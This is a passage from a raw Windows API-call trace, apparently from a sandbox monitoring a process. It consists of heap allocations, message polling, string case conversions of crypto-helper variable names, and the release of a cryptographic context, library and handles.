hHeap=0x970000) returned 1 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0219.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0219.997] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.997] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0219.997] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0219.998] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0219.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0219.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0219.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0219.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0219.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0219.998] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0219.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0219.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0219.998] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f648 | out: hHeap=0x970000) returned 1 [0219.998] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0219.998] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0219.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0219.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0219.999] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.999] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0219.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0219.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0219.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.999] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0219.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04700 | out: hHeap=0x970000) returned 1 [0219.999] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0219.999] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0219.999] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0219.999] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0220.068] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0220.069] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.069] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0220.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7d8 | out: hHeap=0x970000) returned 1 [0220.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0220.069] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.069] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69a08, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0220.069] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.070] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f38 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51028 [0220.070] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0220.070] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ef0 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f378 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0220.071] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0220.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0220.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0220.071] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0220.071] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0220.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f045e8 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cc8 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0220.072] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.072] FreeLibrary (hLibModule=0x756e0000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0220.072] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0220.072] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0220.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0220.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0220.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0220.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f20 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0220.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0220.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0220.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0220.073] CloseHandle (hObject=0x2d0) returned 1 [0220.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0220.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.074] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04810 | out: hHeap=0x970000) returned 1 [0220.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0220.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0220.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0220.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0220.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0220.076] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6c0 | out: hHeap=0x970000) returned 1 [0220.077] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50db8 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e18 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e78 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d70 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0220.077] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e90 [0220.077] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0220.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0220.078] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0220.078] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0220.078] CloseHandle (hObject=0x2a0) returned 1 [0220.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0220.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.154] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14818 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e78 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d70 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f3a0 | out: hHeap=0x970000) returned 1 [0220.156] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0220.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0220.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0220.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0220.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0220.156] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0220.156] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0220.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0220.157] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ce0 | out: hHeap=0x970000) returned 1 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0220.157] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f698 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f468 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0220.159] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 